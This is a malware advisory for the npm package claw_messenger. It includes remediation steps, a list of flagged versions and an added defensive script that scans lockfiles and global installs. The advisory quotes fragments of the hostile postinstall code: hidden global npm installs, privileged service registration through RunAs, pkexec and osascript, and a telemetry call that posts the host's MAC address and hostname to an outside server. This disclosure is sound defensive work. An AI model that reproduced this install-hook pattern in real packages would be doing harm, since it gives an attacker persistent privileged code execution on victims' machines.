Malicious package

claw_messenger (npm)

Malicious code in claw_messenger (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-4526
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall claw_messenger

What this malware does

The postinstall lifecycle script in dist/postinstall.js spawns two detached, hidden child processes during npm install.

(1) spawn('npm', ['install', '-g', 'opencode-ai', '--registry=https://registry.npmmirror.com',...], { shell: true, detached: true, stdio: 'ignore', windowsHide: true }) silently performs a global npm install of opencode-ai from a non-default registry mirror. opencode-ai is not declared in package.json or documented in the README, so the package surreptitiously expands the installer's globally-installed package surface to undocumented third-party code that the author or any future hijacker of that name can mutate.

(2) An update-silent-service flow loads dist/service-installer.js, which runs execSync('npm install -g claw-subagent-service@latest', { stdio: 'inherit', timeout: 120000 }) against a mutable @latest tag. dist/daemon-manager.js then elevates and registers the resulting binary as a privileged auto-start system service: on Windows via Start-Process sc -ArgumentList 'start claw-subagent-service' -Verb RunAs, on Linux via systemd with pkexec/sudo, on macOS via osascript... with administrator privileges.

The combination (install-time, hidden, no-consent, unpinned remote dependency fetch followed by privileged auto-start service registration) gives the author (and anyone who later compromises opencode-ai or claw-subagent-service) persistent root/Administrator code execution on every machine that installs claw_messenger.

Separately, dist/auto-register.js posts the host's MAC address and hostname to https://newsradar.dreamdt.cn/im/api/claw/register on plugin load, which is undocumented device-tracking telemetry but is secondary to the install-time RCE surface.

Malicious versions

12 flagged
0.0.76, 0.0.77, 0.0.78, 0.0.79, 0.0.80, 0.0.81, 0.0.83, 0.0.84, 0.0.89, 0.0.91, 0.0.94, 0.0.95
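
A lockfile and global-install check for the packages named in this advisory, as an added example that is not part of the original advisory or of O3 Security's tooling. It assumes a parsed package-lock.json and the parsed output of npm ls -g --depth=0 --json; the function names and the sample inputs are constructed for illustration.

```javascript
// Added example. Package names and versions come from the advisory text.
const FLAGGED = new Set(['0.0.76', '0.0.77', '0.0.78', '0.0.79', '0.0.80', '0.0.81',
  '0.0.83', '0.0.84', '0.0.89', '0.0.91', '0.0.94', '0.0.95']);
// Packages the postinstall flow installs globally, per the advisory.
const GLOBAL_DROPS = ['opencode-ai', 'claw-subagent-service'];

const hit = (where, version) => ({ where, version, flagged: FLAGGED.has(version) });

// Lockfile v2/v3: flat "packages" map keyed by install path.
function scanPackagesMap(packages, hits) {
  for (const [path, meta] of Object.entries(packages || {})) {
    // The last path segment after "node_modules/" is the package name.
    if (path.split('node_modules/').pop() === 'claw_messenger') {
      hits.push(hit(path, meta.version));
    }
  }
}

// Lockfile v1: nested "dependencies" tree, walked recursively.
function scanDependencyTree(deps, trail, hits) {
  for (const [name, meta] of Object.entries(deps || {})) {
    if (name === 'claw_messenger') hits.push(hit([...trail, name].join(' > '), meta.version));
    scanDependencyTree(meta.dependencies, [...trail, name], hits);
  }
}

// lock: parsed package-lock.json; globalLs: parsed `npm ls -g --depth=0 --json`.
function auditHost(lock, globalLs) {
  const lockHits = [];
  if (lock.packages) scanPackagesMap(lock.packages, lockHits);
  else scanDependencyTree(lock.dependencies, [], lockHits);
  const installed = (globalLs && globalLs.dependencies) || {};
  const globalHits = GLOBAL_DROPS.filter((name) => name in installed);
  const found = lockHits.length > 0 || globalHits.length > 0;
  return { lockHits, globalHits, action: found ? 'remove-and-rotate' : 'none' };
}

// Constructed sample inputs (not taken from a real host).
const sampleLock = { lockfileVersion: 3, packages: {
  '': { name: 'demo-app', version: '1.0.0' },
  'node_modules/some-plugin': { version: '2.1.0' },
  'node_modules/some-plugin/node_modules/claw_messenger': { version: '0.0.91' } } };
const sampleGlobal = { dependencies: {
  npm: { version: '10.0.0' }, 'claw-subagent-service': { version: '1.0.0' } } };

console.log(JSON.stringify(auditHost(sampleLock, sampleGlobal), null, 2));
```

A hit under another package's node_modules path means claw_messenger arrived transitively, so npm uninstall claw_messenger on the top-level project will not remove it. Entries in globalHits are separate global installs and need their own removal alongside the registered service.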

Indicators of compromise (SHA-256)

Frequently asked questions

No. claw_messenger on npm has been identified as a malicious package (versions 0.0.76, 0.0.77, 0.0.78, 0.0.79, 0.0.80, 0.0.81, 0.0.83, 0.0.84, and 4 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Credits

  • Amazon Inspector · finder

claw_messenger (npm) malicious package — MAL-2026-4526 | O3 Security